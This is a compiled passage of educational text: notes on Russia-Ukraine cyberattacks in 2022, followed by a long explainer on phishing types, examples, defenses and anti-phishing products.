Ukraine and the authorization of Russian troop deployments there. The US and
UK blamed the attack on Russia. Russia denied the accusations and called them
“Russophobic”.[24]
On February 26, the Minister of Digital Transformation of Ukraine Mykhailo
Fedorov announced the creation of an IT army, which will include cyber
specialists, copywriters, designers, marketers and targetologists. As a result,
numerous Russian government websites and banks were attacked. [28] Dozens of
issues of Russian stars and officials have been made public, and Ukrainian songs
have been broadcast on some television channels, including Prayer for Ukraine.[29]
[30]
March attacks

Ratio of DNS queries defensively blocked by Quad9 in Ukraine and Poland, 7-9
March 2022.
Beginning on 6 March, Russia began to significantly increase the frequency of its
cyber-attacks against Ukrainian civilians.[31]
On 9 March alone, the Quad9 malware-blocking recursive resolver intercepted
and mitigated 4.6 million attacks against computers and phones in Ukraine and
Poland, at a rate more than ten times higher than the European average.
Cybersecurity expert Bill Woodcock of Packet Clearing House noted that the
blocked DNS queries coming from Ukraine clearly show an increase in phishing
and malware attacks against Ukrainians, and noted that the Polish numbers were
also higher than usual because 70%, or 1.4 million, of the Ukrainian refugees were
in Poland at the time.[32] Explaining the nature of the attack, Woodcock said
"Ukrainians are being targeted by a huge amount of phishing, and a lot of the
malware that is getting onto their machines is trying to contact malicious
command-and-control infrastructure."[31]
On March 28, RTComm.ru, a Russian Internet service provider, BGP hijacked
Twitter's 104.244.42.0/24 IPv4 address block for a period of two hours fifteen
minutes.[33][34]

PHISHING:
Phishing definition
Phishing is a type of cyberattack that uses disguised email as a weapon. These
attacks use social engineering techniques to trick the email recipient into
believing that the message is something they want or need—a request from their
bank, for instance, or a note from someone in their company—and to click a link
or download an attachment.
"Phish" is pronounced just like it's spelled, which is to say like the word "fish"—
the analogy is of an angler throwing a baited hook out there (the phishing email)
and hoping you bite.
Phishing emails can be targeted in several different ways, with some not being
targeted at all, some being "soft targeted" at someone playing a particular role in
an organization, and some being targeted at specific, high-value people.
Phishing history
One of the oldest types of cyberattacks, phishing dates back to the 1990s, and it's
still one of the most widespread and pernicious, with phishing messages and
techniques becoming increasingly sophisticated.
The term arose among hackers aiming to trick AOL users into giving up their login
information. The "ph" is part of a tradition of whimsical hacker spelling, and was
probably influenced by the term "phreaking," short for "phone phreaking," an
early form of hacking that involved playing sound tones into telephone handsets
to get free phone calls.
Some phishing scams have succeeded well enough to make waves:
 Perhaps one of the most consequential phishing attacks in history
happened in 2016, when hackers managed to get Hillary Clinton campaign
chair John Podesta to offer up his Gmail password.
 The "fappening" attack, in which intimate photos of a number of celebrities
were made public, was originally thought to be a result of insecurity on
Apple's iCloud servers, but was in fact the product of a number of
successful phishing attempts.
 In 2016, employees at the University of Kansas responded to a phishing
email and handed over access to their paycheck deposit information,
resulting in them losing pay.
What a phishing email can do
There are a couple of different ways to break attacks down into categories. One is
by the purpose of the phishing attempt—what it is intended to do. Generally, a
phishing campaign tries to get the victim to do one of two things:
Hand over sensitive information. These messages aim to trick the user into
revealing important data—often a username and password that the attacker can
use to breach a system or account. The classic version of this scam involves
sending out an email tailored to look like a message from a major bank; by
spamming out the message to millions of people, the attackers ensure that at
least some of the recipients will be customers of that bank. The victim clicks on a
link in the message and is taken to a malicious site designed to resemble the
bank's webpage, and then hopefully enters their username and password. The
attacker can now access the victim's account.
Download malware. Like a lot of spam, these types of phishing emails aim to get
the victim to infect their own computer with malware. Often the messages are
"soft targeted"—they might be sent to an HR staffer with an attachment that
purports to be a job seeker's resume, for instance. These attachments are
often .zip files, or Microsoft Office documents with malicious embedded code.
One of the most common form of malicious code is ransomware—in 2017 it was
estimated that 93% of phishing emails contained ransomware attachments.
Types of phishing
Another way to categorize these attacks is by who they target and how the
messages are sent. If there's a common denominator among phishing attacks, it's
the disguise. The attackers spoof their email address so it looks like it's coming
from someone else, set up fake websites that look like ones the victim trusts, and
use foreign character sets to disguise URLs.
That said, there are a variety of techniques that fall under the umbrella of
phishing. Each of these types of phishing are a variation on a theme, with the
attacker masquerading as a trusted entity of some kind, often a real or plausibly
real person, or a company the victim might do business with.
Email phishing: With general, mass-market phishing attacks, emails are sent to
millions of potential victims to try to trick them into logging in to fake versions of
very popular websites.
Ironscales has tallied the most popular brands that hackers use in their phishing
attempts. Of the 50,000-plus fake login pages the company monitored, these
were the top brands attackers used:
 PayPal: 22%
 Microsoft: 19%
  Facebook: 15%
 eBay: 6%
 Amazon: 3%
Spear phishing: When attackers craft a message to target a specific individual. For
instance, the spear phisher might target someone in the finance department and
pretend to be the victim's manager requesting a large bank transfer on short
notice.
Whaling: Whale phishing, or whaling, is a form of spear phishing aimed at the
very big fish—CEOs or other high-value targets like company board members.
Gathering enough information to trick a really high-value target might take time,
but it can have a surprisingly high payoff. In 2008, cybercriminals targeted
corporate CEOs with emails that claimed to have FBI subpoenas attached. In fact,
they downloaded keyloggers onto the executives' computers—and the scammers'
success rate was 10%, snagging almost 2,000 victims.
Business email compromise (BEC): A type of targeted phishing attack in which
attackers purport to be a company’s CEO or other top executive, typically to get
other individuals in that organization to transfer money.
Vishing and smishing: Phishing via phone call and text message, respectively.
Other types of phishing include clone phishing, snowshoeing, social media
phishing, and more—and the list grows as attackers are constantly evolving their
tactics and techniques.
How phishing works
All the tools needed to launch phishing campaigns (known as phishing kits), as
well as mailing lists are readily available on the dark web, making it easy for cyber
criminals, even those with minimal technical skills, to pull off phishing attacks.
A phishing kit bundles phishing website resources and tools that need only be
installed on a server. Once installed, all the attacker needs to do is send out
emails to potential victims.
Some phishing kits allow attackers to spoof trusted brands, increasing the chances
of someone clicking on a fraudulent link. Akamai's research provided in its
Phishing--Baiting the Hook report found 62 kit variants for Microsoft, 14 for
PayPal, seven for DHL, and 11 for Dropbox.
The Duo Labs report, Phish in a Barrel, includes an analysis of phishing kit reuse.
Of the 3,200 phishing kits that Duo discovered, 900 (27%) were found on more
than one host. That number might actually be higher, however. “Why don’t we
see a higher percentage of kit reuse? Perhaps because we were measuring based
on the SHA1 hash of the kit contents. A single change to just one file in the kit
would appear as two separate kits even when they are otherwise identical,” said
Jordan Wright, a senior R&D engineer at Duo and the report’s author.
Duo Security
Phishing examples
Criminals rely on deception and creating a sense of urgency to achieve success
with their phishing campaigns. As the following examples show, these social
engineers know how to capitalize on a crisis.
Phishing example: Corona update
The following screen capture is a phishing campaign discovered by Mimecast
that attempts to steal login credentials of the victim's Microsoft OneDrive
account. The attacker knew that with more people working from home, sharing
of documents via OneDrive would be common.

Mimecast
Phishing example: Covid cure
This phishing campaign, identified by Proofpoint, asks victims to load an app on
their device to "run simulations of the cure" for COVID-19. The app, of course, is
malware.
 Proofpoint
Phishing example: A matter of public health
This email appears to be from Canada's Public Health Agency and asks recipients
to click on a link to read an important letter. The link goes to a malicious
document.

Proofpoint
How to prevent phishing
The best way to learn to spot phishing emails is to study examples captured in the
wild! Lehigh University's technology services department maintains a gallery of
recent phishing emails received by students and staff.
There also are a number of steps you can take and mindsets you should get into
that will keep you from becoming a phishing statistic, including:
 Always check the spelling of the URLs in email links before you click or enter
sensitive information
 Watch out for URL redirects, where you're subtly sent to a different website
with identical design
 If you receive an email from a source you know but it seems suspicious,
contact that source with a new email, rather than just hitting reply
 Don't post personal data, like your birthday, vacation plans, or your address
or phone number, publicly on social media
If you work in your company's IT security department, you can implement
proactive measures to protect the organization, including:
 "Sandboxing" inbound email, checking the safety of each link a user clicks
 Inspecting and analyzing web traffic
 Conducting phishing tests to find weak spots and use the results to educate
employees
Encouraging employees to send you suspected phishing emails—and then
following Phishing: Mass-market emails
The most common form of phishing is the general, mass-mailed type, where
someone sends an email pretending to be someone else and tries to trick the
recipient in doing something, usually logging into a website or downloading
malware. Attacks frequently rely on email spoofing, where the email header—the
from field—is forged to make the message appear as if it were sent by a trusted
sender.
However, phishing attacks don’t always look like a UPS delivery notification email,
a warning message from PayPal about passwords expiring, or an Office 365 email
about storage quotas. Some attacks are crafted to specifically target organizations
and individuals, and others rely on methods other than email.
Spear phishing: Going after specific targets
Phishing attacks get their name from the notion that fraudsters are fishing for
random victims by using spoofed or fraudulent email as bait. Spear phishing
attacks extend the fishing analogy as attackers are specifically targeting high-value
victims and organizations. Instead of trying to get banking credentials for 1,000
consumers, the attacker may find it more lucrative to target a handful of
businesses. A nation-state attacker may target an employee working for another
government agency, or a government official, to steal state secrets.
Spear phishing attacks are extremely successful because the attackers spend a lot
of time crafting information specific to the recipient, such as referencing a
conference the recipient may have just attended or sending a malicious
attachment where the filename references a topic the recipient is interested in.
In a 2017 phishing campaign, Group 74 (a.k.a. Sofact, APT28, Fancy Bear) targeted
cybersecurity professionals with an email pretending to be related to the Cyber
Conflict U.S. conference, an event organized by the United States Military
Academy’s Army Cyber Institute, the NATO Cooperative Cyber Military Academy,
and the NATO Cooperative Cyber Defence Centre of Excellence. While CyCon is a
real conference, the attachment was actually a document containing a malicious
Visual Basic for Applications (VBA) macro that would download and execute
reconnaissance malware called Seduploader.
Whaling: Going after the big one
Different victims, different paydays. A phishing attack specifically targeting an
enterprise’s top executives is called whaling, as the victim is considered to be
high-value, and the stolen information will be more valuable than what a regular
employee may offer. The account credentials belonging to a CEO will open more
doors than an entry-level employee. The goal is to steal data, employee
information, and cash.
Whaling also requires additional research because the attacker needs to know
who the intended victim communicates with and the kind of discussions they
have. Examples include references to customer complaints, legal subpoenas, or
even a problem in the executive suite. Attackers typically start with social
engineering to gather information about the victim and the company before
crafting the phishing message that will be used in the whaling attack.
Business email compromise (BEC): Pretending to be the CEO
Aside from mass-distributed general phishing campaigns, criminals target key
individuals in finance and accounting departments via business email compromise
(BEC) scams and CEO email fraud. By impersonating financial officers and CEOs,
these criminals attempt to trick victims into initiating money transfers into
unauthorized accounts.
Typically, attackers compromise the email account of a senior executive or
financial officer by exploiting an existing infection or via a spear phishing attack.
The attacker lurks and monitors the executive’s email activity for a period of time
to learn about processes and procedures within the company. The actual attack
takes the form of a false email that looks like it has come from the compromised
executive’s account being sent to someone who is a regular recipient. The email
appears to be important and urgent, and it requests that the recipient send a wire
transfer to an external or unfamiliar bank account. The money ultimately lands in
the attacker’s bank account.
According to the Anti-Phishing Working Group's Phishing Activity Trends Report
for Q2 2020, "The average wire transfer loss from Business Email Compromise
(BEC) attacks is increasing: The average wire transfer attempt in the second
quarter of 2020 was $80,183."
Clone phishing: When copies are just as effective
Clone phishing requires the attacker to create a nearly identical replica of a
legitimate message to trick the victim into thinking it is real. The email is sent
from an address resembling the legitimate sender, and the body of the message
looks the same as a previous message. The only difference is that the attachment
or the link in the message has been swapped out with a malicious one. The
attacker may say something along the lines of having to resend the original, or an
updated version, to explain why the victim was receiving the “same” message
again.
This attack is based on a previously seen, legitimate message, making it more
likely that users will fall for the attack. An attacker who has already infected one
user may use this technique against another person who also received the
message that is being cloned. In another variation, the attacker may create a
cloned website with a spoofed domain to trick the victim.
Vishing: Phishing over the phone
Vishing stands for “voice phishing” and it entails the use of the phone. Typically,
the victim receives a call with a voice message disguised as a communication from
a financial institution. For instance, the message might ask the recipient to call a
number and enter their account information or PIN for security or other official
purposes. However, the phone number rings straight to the attacker via a voice-
over-IP service.
In a sophisticated vishing scam in 2019, criminals called victims pretending to be
Apple tech support and providing users with a number to call to resolve the
“security problem.” Like the old Windows tech support scam, this scams took
advantage of user fears of their devices getting hacked.
Smishing: Phishing via text message
Smishing, a portmanteau of "phishing" and "SMS," the latter being the protocol
used by most phone text messaging services, is a cyberattack that uses misleading
text messages to deceive victims. The goal is to trick you into believing that a
message has arrived from a trusted person or organization, and then convincing
you to take action that gives the attacker exploitable information (like bank
account login credentials, for example) or access to your mobile device.
Smishing is on the rise because people are more likely to read and respond to text
messages than email: 98% of text messages are read and 45% are responded to,
while the equivalent numbers for email are 20% and 6%, respectively.And users
are often less watchful for suspicious messages on their phones than on their
computers, and their personal devices generally lack the type of security available
on corporate PCs.
Snowshoeing: Spreading poisonous messages
Snowshoeing, or “hit-and-run” spam, requires attackers to push out messages via
multiple domains and IP addresses. Each IP address sends out a low volume of
messages, so reputation- or volume-based spam filtering technologies can’t
recognize and block malicious messages right away. Some of the messages make
it to the email inboxes before the filters learn to block them.
Hailstorm campaigns work the same as snowshoe, except the messages are sent
out over an extremely short time span. Some hailstorm attacks end just as the
anti-spam tools catch on and update the filters to block future messages, but the
attackers have already moved on to the next campaign.
Learn to recognize different types of phishing
Users aren’t good at understanding the impact of falling for a phishing attack. A
reasonably savvy user may be able to assess the risk of clicking on a link in an
email, as that could result in a malware download or follow-up scam messages
asking for money. However, a naive user may think nothing would happen, or
wind up with spam advertisements and pop-ups. Only the most-savvy users can
estimate the potential damage from credential theft and account compromise.
This risk assessment gap makes it harder for users to grasp the seriousness of
recognizing malicious messages.
Organizations need to consider existing internal awareness campaigns and make
sure employees are given the tools to recognize different types of attacks.
Organizations also need to beef up security defenses, because some of the
traditional email security tools—such as spam filters—are not enough defense
against some phishing types.
Phishing continues to be one of the primary attack mechanisms for bad actors
with a variety of endgames in mind, in large part because phishing attacks are
trivial to launch and difficult to fully protect against. Some phishing attacks target
customers rather than employees, and others simply aim to damage your
corporate reputation rather than compromise your systems. A key factor in
protecting your business from phishing is to understand your vulnerabilities,
weigh the potential risk to your business, and decide what tools offer the best
protection to match your business needs.
Why phishing is successful
Most phishing attacks are less about the technology and more about social
engineering. It’s amazing how easily humans are manipulated when emotions are
triggered. Many modern phishing emails play on empathy or fear, or even make
hostile accusations in order to trigger an angry response.
Another reason phishing is so successful and popular is that it can be used to
disrupt a target in a number of different ways -- for example, by impacting human
productivity by requiring employees to manually validate message contents or to
involve corporate IT, or compromising financial accounts or enterprise systems
(often leading to ransomware attacks). On the flip side, phishing is hard to
prevent because of the risk of false positives disrupting legitimate business
communication.
How to protect your business against phishing
A big part of protecting your business, employees, and customers from phishing
attacks is by leveraging industry standards and implementing best practices
whenever possible. Standards like Sender Policy Framework (SPF), DomainKeys
Identified Mail (DKIM), and Domain-based Message Authentication, Reporting,
and Conformance (DMARC) are all intended to fight the prevalence of SPAM by
allowing receiving email servers to authenticate the servers they receive mail
from. Put another way, the goal of these standards is to ensure that mail servers
claiming to be sending on behalf of your domain is authorized to do so. Each of
these standards are based in DNS and are relatively straightforward to
implement.
In fact, you probably get your email through a service provider like Google or
Microsoft, and that service includes up to date implementation of these
standards. Professional email services like these provide some level of protection
against phishing already, but they are far from perfect, leaving open a market for
these services.
One major attack method is geared toward stealing information through low-tech
methods such as email replies. Tools like content policies available in business
productivity services such as Microsoft 365, Google Workspace, and even as a
third-party tool from multiple vendors, are invaluable for preventing this sort of
attack from reaching a successful conclusion. Content policies help automate the
identification of key information types like credit card or bank account numbers,
social security numbers, and other information that should be closely guarded,
and prevent this information from being sent outside the organization.
The biggest risk stemming from phishing attacks for most enterprises is system
compromise ultimately resulting in financial or data loss (or even ransomware). As
such the primary defense mechanism must be a strong form of multi-factor
authentication (MFA) and authentication standards such as Fast Identity Online v2
(FIDO2) or Web Authentication (WebAuthn). Ideally enterprises should be taking
MFA a step further and introducing password-less authentication using zero-trust.
Modern authentication strategies like risk-based authentication and Security
Assertion Markup Language (SAML) are also powerful tools in preventing the
worst-case scenario from occurring due to a successful phishing attack. Each of
these components have a role to play in your organization, but the benefits are
two-fold: the damage done from a compromised password is minimized (if not
eradicated), and systems are put in place to be able to analyze authentication
attempts and react to compromised credentials in real time.
Top anti-phishing tools
A variety of tools are available to help protect your business from the types of
threats phishing attacks present your organization. Half the battle is knowing
what solutions are available and how they can help protect your business, and
thus your employees and customers.
1. Avanan
Avanan offers anti-phishing software for cloud-hosted email, tying into your email
provider using APIs to train their AI using historical email. The service analyzes not
just message contents, formatting, and header information, but evaluates existing
relationships between senders and receivers to establish a level of trust.
2. Barracuda Sentinel
Barracuda Sentinel is another tool that leverages mail provider APIs to protect
against phishing as well as business email compromise (BEC). Because
compromised email accounts tend to lead to more phishing attempts or further
account-based attacks, Barracuda’s focus on minimizing further damage as a
result of a successful phishing attempt has more value than relying solely on
prevention. Barracuda also provides brand protection and domain fraud
prevention through DMARC analysis and reporting.
3. BrandShield
BrandShield focuses exclusively on protecting your corporate brand and that of
your executives. Identifying phishing attacks (through email, social media, or
other mediums) which leverage your brand or the names of your executives is just
one component of BrandShield’s portfolio. BrandShield also monitors the internet
for rogue websites using your brand as well as marketplaces like Amazon where
physical counterfeits of your products could pop up for sale.
4. Cofense PDR
Cofense PDR (Phishing Detection and Response) is a managed service where both
AI-based tools and security professionals are leveraged in concert to identify and
mitigate phishing attacks as they happen. Managed services can be a good option
if you need to maximize the level of protection, as they can be more effective
than even hiring a full-time team to handle phishing prevention since the
managed services team is able to evaluate threat data from all of the enterprise
systems they protect.
5. RSA FraudAction
RSA FraudAction anti-phishing service obviously comes from one of the big names
in network security, and the list of features offered is what you’d expect from a
heavy hitter. The anti-phishing service is a managed service like what Cofense
offers, and RSA brings capabilities like site shutdown, forensics, and optional
countermeasures such as strategically responding to phishing attempts with
planted credentials in order to track the attack chain and respond accordingly.
6. IRONSCALES
IRONSCALES is an email security platform that seeks to strengthen your existing
email system through dynamic detection and analysis: blocking, flagging, or
simply adding a banner to potentially suspicious email. IRONSCALES also offers
end user training, focused on email security and general awareness, which helps
strengthen your defense against the core of phishing: the social engineering
attack.
7. KnowBe4
KnowBe4 boasts one of the biggest names in hacking (Kevin Mitnick) as their Chief
Hacking Officer. Many of Mitnick’s exploits were centered around social
engineering, and their business reflects that by focusing on enabling employees to
make better decisions through education. In addition to their top-rated
awareness training KnowBe4 also offers PhishER, which is a Security
Orchestration, Automation, and Response (SOAR) platform centered around
phishing attempts: enabling your security team to more efficiently respond to
email-based threats to your organization.
8. Mimecast
Mimecast offers several tools for protecting against phishing attempts, including
features which detect malicious links and attachments removing them or
rendering them safe using advanced methods like sandboxing. Mimecast’s ability
to prevent code-based attacks initiated through phishing emails or more
sophisticated methods like QR codes by opening links within the Mimecast cloud,
simplifying the deployment process and ensuring prevention tools are always
updated to the bleeding age.
9. Microsoft Defender for Office 365
Microsoft Defender for Office 365 brings similar capabilities as some of the other
tools on this list: user training, phishing detection and prevention, forensic and
root-cause analysis, and even threat hunting. Because Defender is simply an add-
on for Office 365, it’s integrated tightly without having to configure the initial
integration. Microsoft also offers preset security policies that you can adjust to
your needs; supporting enforcement, the option for users to override, and
tracking policy changes over time. This service has special advantages for Office
365 customers, and special disadvantages for everyone else.
10. Valimail
Valimail should be of interest even to IT shops with little-to-no budget. Valimail’s
DMARC offering walks you through configuring DMARC for your email domains,
and then aggregates and generates daily DMARC reports. Gaining this visibility
into email authentication can help you rapidly identify additional senders that
may be legitimate, potentially add them to your DMARC configuration, and then
ramp up enforcement in order to prevent unauthorized email forging your
domain. The best part is that Valimail offers several of their DMARC tools for free.
The other service Valimail offers is Amplify, which facilitates implementation of
the BIMI standard (Brand Indicators for Message Identification), which adds a
corporate logo to email originating from your organization, showing that the
sender is authenticated and valid. BIMI not only adds a layer of sophistication to
your email config, it enhances trust in emails coming from your domain both for
receiving servers and ultimately the recipient.